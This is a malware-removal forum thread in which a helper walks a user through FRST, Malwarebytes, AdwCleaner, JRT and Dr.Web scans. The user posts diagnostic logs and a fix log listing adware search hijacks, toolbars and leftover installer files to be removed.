Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.


System errors:
=============
Error: (03/08/2016 10:24:37 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/08/2016 10:21:42 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: App

Error: (03/08/2016 10:21:16 PM) (Source: DCOM) (EventID: 10001) (User: DURABLE)
Description: "C:\WINDOWS\System32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider31Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProviderUnavailableUnavailable

Error: (03/08/2016 10:18:10 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Security Center service hung on starting.

Error: (03/08/2016 10:18:06 PM) (Source: DCOM) (EventID: 10001) (User: DURABLE)
Description: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca31CortanaUI.AppXtpp90jhw9p0njjb85kvhxpppgrqfp117.mcaUnavailableUnavailable

Error: (03/08/2016 10:18:06 PM) (Source: DCOM) (EventID: 10001) (User: DURABLE)
Description: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca31CortanaUI.AppXn73w0hsq3g4wx1h9fhf7q02vw2wta6qc.mcaUnavailableUnavailable

Error: (03/08/2016 10:16:05 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Intel® Management & Security Application User Notification Service service hung on starting.

Error: (03/08/2016 10:13:56 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Delivery Optimization service hung on starting.

Error: (03/08/2016 10:09:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Net.Pipe Listener Adapter service failed to start due to the following error:
%%1053

Error: (03/08/2016 10:09:37 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Net.Pipe Listener Adapter service to connect.


CodeIntegrity:
===================================
  Date: 2016-03-08 23:00:05.241
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 23:00:05.120
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.432
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.316
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.181
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:49.034
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:48.903
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:48.774
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:43.470
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-08 22:59:43.270
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 520 @ 2.40GHz
Percentage of memory in use: 67%
Total physical RAM: 3890.67 MB
Available physical RAM: 1259.89 MB
Total Virtual: 8754.67 MB
Available Virtual: 5904.86 MB

==================== Drives ================================

Drive c: (TI105835W0O) (Fixed) (Total:453.17 GB) (Free:105.28 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: E56E3D6C)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=453.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=511 MB) - (Type=27)
Partition 4: (Not Active) - (Size=10.6 GB) - (Type=17)

==================== End of Addition.txt ============================

Link to post
Share on other sites

Thanks for those logs, you do not mention if system restore was completed successfully?

 

Next,

 

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply.

 

Next,

 

Please open Malwarebytes Anti-Malware.

  • On the Settings tab > Detection and Protection sub tab, Detection Options, tick the box "Scan for rootkits".
  • Under Non-Malware Protection sub tab Change PUP and PUM entries to Treat detections as Malware
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete Apply Actions to any found entries.
  • Wait for the prompt to restart the computer to appear (if applicable), then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.


To get the log from Malwarebytes do the following:

  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click Export > From export you have three options:

      Copy to Clipboard - if seleted right click to your reply and select "Paste" log will be pasted to your reply
      Text file (*.txt)        - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
      XML file (*.xml)      - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
  • Please use "Copy to Clipboard, then Right click to your reply > select "Paste" that will copy the log to your reply…


 

Next,

 

Download AdwCleaner by Xplode onto your Desktop.

  • Double click on Adwcleaner.exe to run the tool.
  • Click on the Scan in the Actions box
  • Please wait fot the scan to finish..
  • When "Waiting for action.Please uncheck elements you want to keep" shows in top line..
  • Click on the Cleaning box.
  • Next click OK on the "Closing Programs" pop up box.
  • Click OK on the Information box & again OK to allow the necessary reboot
  • After restart the AdwCleaner(C*)-Notepad log will appear, please copy/paste it in your next reply. Where * is the number relative to list of scans completed...

 
Next,
 
thisisujrt.gif Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts. (re-enable when done)
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

 

Next,

 

dr_web_cureit_zpse80d87bf.jpg
Download Dr Web Cureit from here http://www.freedrweb.com/cureit save to your desktop. (Scroll to bottom of page)

  • The file will be randomly named
  • Reboot to safe mode <<<<<------------ http://www.computerhope.com/issues/chsafe.htm
  • Run Dr Web
  • Tick the I agree box and select continue
  • Click select objects for scanning


    drwebselect.JPG

  • Tick all boxes as shown
  • Click the wrench and select automatically apply actions to threats


    drwebfolders.JPG

  • Press start scan
  • The scan will now commence


    drwebscan.JPG

  • Once the scan has finished click open report <<<--- Do not miss this step


    drwebscancomplete.JPG

  • A notepad will open
  • Select File > Save as..
  • Save it to your desktop



This log will be excessive,  Please attach it to your next reply…
 

Let me see those logs, also give an update on any remaining issues or concerns....

 

Thank you.

 

Kevin

Fixlist.txt

Link to post
Share on other sites

I believe the restore was successful.  I am not noting any of the same problems.  I am attaching the first log after the fix here and moving on to Malwarebytes.  Thank you for your continued help. 

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Lexi (2016-03-09 10:01:31) Run:1
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
KU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
URLSearchHook: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 - (No Name) - {8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} - No File
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM-x32 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2EDC592E-BE3B-45E6-9A09-3818FD7629D6} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=&apn_dtid=OSJ000&apn_uid=6B700B84-D3AD-42B9-8117-AA8044508D55&apn_sauid=7FF7FD87-FFF2-42ED-8F75-9A7D9889C78F
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=ZUxdm080YYus&ptnrS=ZUxdm080YYus&si=CN6I_MvxtqkCFcJ05QodXBLK-A&ptb=v2P0GRVCoTDCO9CyDZdlcg&ind=2011061422&n=77de5cae&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL =
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?q={SEARCHTERMS}&o=15527&l=dis&prt=360&chn=retail&geo=US&ver=4
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3298582&CUI=UN25864562382803126&UM=2
BHO-x32: No Name -> {9D425283-D487-4337-BAB6-AB8354A81457} -> No File
BHO-x32: Fast Free Converter 4.1 -> {F5580E24-8416-4DFD-90B3-078D4EDF4FCB} -> C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll [2013-11-21] (Fast Free Converter)
Toolbar: HKLM-x32 - Secure Online Account Numbers - {A8C7C2CA-6DFD-4E16-8458-592361564D38} - C:\Program Files (x86)\Discover\SOAN\DiscoverSOANToolbar.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
Toolbar: HKLM-x32 - No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKLM-x32 - MixiDJ V46 Toolbar - {62cad681-699f-4f83-b87f-95584003592f} - C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll [2013-05-16] ()
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {9D425283-D487-4337-BAB6-AB8354A81457} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {62CAD681-699F-4F83-B87F-95584003592F} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  No File
DPF: HKLM-x32 {2FF8D282-F78A-4A33-ABC2-49E72A341482} hxxp://riteaid.storefront.com/images/global/activex/SFImageUpload1_10.CAB
DPF: HKLM-x32 {C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F} hxxp://www.ritzpix.com/net/Uploader/LPUploader57.cab
FF Homepage: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF HKLM-x32\...\Firefox\Extensions: [extension@Fast_Free_Converter.com] - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com
FF Extension: No Name - C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com [2016-03-08] [not signed]
FF HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Firefox\Extensions: [{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}] - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}
FF Extension: XULRunner - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} [2010-09-19] [not signed]
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
2016-03-08 22:04 - 2011-06-14 21:43 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\FunWebProducts
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Conduit
2016-03-08 22:04 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\Local\Conduit
2016-03-08 22:03 - 2013-06-18 14:18 - 00000000 ____D C:\Program Files (x86)\Conduit
2011-09-30 18:11 - 2011-09-30 18:11 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe
2011-12-24 15:45 - 2011-12-24 15:45 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe
2012-01-25 15:47 - 2012-01-25 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe
2011-11-01 21:04 - 2011-11-01 21:04 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe
2011-10-16 11:32 - 2011-10-16 11:32 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe
2011-08-13 08:55 - 2011-08-13 08:55 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe
2012-01-26 18:05 - 2012-01-26 18:05 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe
2011-09-19 14:57 - 2011-09-19 14:57 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe
2011-10-15 12:37 - 2011-10-15 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe
2011-09-21 21:26 - 2011-09-21 21:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe
2011-11-10 10:20 - 2011-11-10 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe
2011-08-08 18:26 - 2011-08-08 18:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe
2011-10-20 12:37 - 2011-10-20 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe
2012-01-11 16:26 - 2012-01-11 16:26 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe
2011-12-20 17:09 - 2011-12-20 17:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe
2011-09-14 17:15 - 2011-09-14 17:15 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe
2011-12-20 02:23 - 2011-12-20 02:23 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe
2011-09-11 09:14 - 2011-09-11 09:14 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe
2011-08-31 16:17 - 2011-08-31 16:17 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(0431a317).exe
2011-08-09 13:53 - 2011-08-09 13:53 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe
2011-08-25 12:37 - 2011-08-25 12:37 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe
2012-01-21 20:50 - 2012-01-21 20:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(05af0912).exe
2011-09-01 10:44 - 2011-09-01 10:44 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe
2011-10-02 17:23 - 2011-10-02 17:23 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe
2011-11-18 10:20 - 2011-11-18 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0cc139e7).exe
2011-12-27 20:18 - 2011-12-27 20:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe
2011-08-28 06:05 - 2011-08-28 06:05 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe
2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-09-04 17:44 - 2011-09-04 17:44 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
